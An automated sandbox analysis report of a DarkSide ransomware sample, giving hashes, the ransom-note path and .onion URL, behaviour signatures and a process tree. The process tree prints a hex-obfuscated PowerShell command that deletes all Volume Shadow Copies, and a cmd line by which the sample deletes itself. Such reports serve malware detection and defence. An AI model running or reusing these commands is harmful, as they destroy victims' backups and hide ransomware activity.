Analysis
-
max time kernel
101s -
max time network
104s -
platform
windows11-21h2_x64 -
resource
win11-20250313-en -
resource tags
arch:x64arch:x86image:win11-20250313-enlocale:en-usos:windows11-21h2-x64system -
submitted
01/04/2025, 04:36
Static task
static1
Behavioral task
behavioral1
Sample
sample3.exe
Resource
win10v2004-20250314-en
Behavioral task
behavioral2
Sample
sample3.exe
Resource
win11-20250313-en
General
-
Target
sample3.exe
-
Size
59KB
-
MD5
943a107b88f85fd88198a9df2e1dc0dd
-
SHA1
bfcf6050ddba6053b738e0c5e54b105880a3c45a
-
SHA256
80c75581d6e09643a8fc7d7e0fa677e95faa64f20141cf493371ea604f6a07c9
-
SHA512
bb179e1deb929502a63d37a19f34808329cb0a5f85618aafcc1eb22ecd91966f12c0033c36a84d966c84dfa86172b0af352e10a086f337f404af34256caacf77
-
SSDEEP
768:GjjmbIax7F3DS4/S9+CuUSbVAdNcxGV1ylvD7Y23W58:Dx7Fu4/ihrhDTV1ylbcZ58
Malware Config
Extracted
C:\Recovery\WindowsRE\README.884ea733.TXT
darkside
http://darksidfqzcuhtk2.onion/CZEX8E0GR0AO4ASUCJE1K824OKJA1G24B8B3G0P84LJTTE7W8EC86JBE7NBXLMRT
Signatures
-
DarkSide
Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
-
Darkside family
-
Renames multiple (144) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
pid Process 3808 powershell.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Sets desktop wallpaper using registry 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\884ea733.BMP" sample3.exe Set value (str) \REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\884ea733.BMP" sample3.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sample3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Modifies Control Panel 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000\Control Panel\Desktop\WallpaperStyle = "10" sample3.exe -
Modifies registry class 5 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.884ea733 sample3.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.884ea733\ = "884ea733" sample3.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\884ea733\DefaultIcon sample3.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\884ea733 sample3.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\884ea733\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\884ea733.ico" sample3.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 3808 powershell.exe 3808 powershell.exe 4940 sample3.exe 4940 sample3.exe -
Suspicious use of AdjustPrivilegeToken 25 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 4940 sample3.exe Token: SeSecurityPrivilege 4940 sample3.exe Token: SeTakeOwnershipPrivilege 4940 sample3.exe Token: SeLoadDriverPrivilege 4940 sample3.exe Token: SeSystemProfilePrivilege 4940 sample3.exe Token: SeSystemtimePrivilege 4940 sample3.exe Token: SeProfSingleProcessPrivilege 4940 sample3.exe Token: SeIncBasePriorityPrivilege 4940 sample3.exe Token: SeCreatePagefilePrivilege 4940 sample3.exe Token: SeBackupPrivilege 4940 sample3.exe Token: SeRestorePrivilege 4940 sample3.exe Token: SeShutdownPrivilege 4940 sample3.exe Token: SeDebugPrivilege 4940 sample3.exe Token: SeSystemEnvironmentPrivilege 4940 sample3.exe Token: SeRemoteShutdownPrivilege 4940 sample3.exe Token: SeUndockPrivilege 4940 sample3.exe Token: SeManageVolumePrivilege 4940 sample3.exe Token: 33 4940 sample3.exe Token: 34 4940 sample3.exe Token: 35 4940 sample3.exe Token: 36 4940 sample3.exe Token: SeDebugPrivilege 3808 powershell.exe Token: SeBackupPrivilege 4236 vssvc.exe Token: SeRestorePrivilege 4236 vssvc.exe Token: SeAuditPrivilege 4236 vssvc.exe -
Suspicious use of WriteProcessMemory 5 IoCs
description pid Process procid_target PID 4940 wrote to memory of 3808 4940 sample3.exe 82 PID 4940 wrote to memory of 3808 4940 sample3.exe 82 PID 4940 wrote to memory of 2352 4940 sample3.exe 88 PID 4940 wrote to memory of 2352 4940 sample3.exe 88 PID 4940 wrote to memory of 2352 4940 sample3.exe 88 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\sample3.exe"C:\Users\Admin\AppData\Local\Temp\sample3.exe"1⤵
- Sets desktop wallpaper using registry
- System Location Discovery: System Language Discovery
- Modifies Control Panel
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4940 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3808
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C DEL /F /Q C:\Users\Admin\AppData\Local\Temp\sample3.exe >> NUL2⤵
- System Location Discovery: System Language Discovery
PID:2352
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4236
Network
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
2Credentials from Web Browsers
1Windows Credential Manager
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD565494ea6831e577d82fac2b91b9c3d43
SHA15c23717d22ee9b94306f2d5a2a53c60aca03eb8c
SHA2565e98b41a51606e16dda30ad4a49457227f75d71ad2004e2942c6b8de6202c4f3
SHA51228ba13f7793ac8271af03b26eaeba6cbe707bf1f07fb1792818a6ab270d1c20d0091ef4a10c092f60c373aefe09698d2b470ec6a7f8cfa47103fd8bbb8d7a7bb
-
Filesize
3KB
MD5aa0a32b11dca7b04f4cc5fe8c55cb357
SHA100e354fd0754a7d721a270cdc08f970b9a3f6605
SHA256e336a593bd31921c46757a88a99759f6a33854d0c8b854c0c8f118e5cede1ea1
SHA5121db91d3540da2c7eb4e151d698f3a9c1d2caed3161c41f1c2c73781a65e9dfc818902f0220c0aa9fc2c617d4851f23f4a576c4e5fe0f40ec78e9ed01c8ad8b30
-
Filesize
1KB
MD58f16eb240c6168b41004cca7306484e6
SHA1da34df40f9b1d5b0f9fd49bd1d467879fb40cb06
SHA25648c69824555f42932cc2a1272a03be650dde58a10239ba282e9314ec13ed273a
SHA51296c4a859b024e531124139c28bebd4d6f53de3ae7bc378ea3c7662452525d4020d1a76f851651174418cae620c340e8677516a3a70933b2ff2cce6a71a349063
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82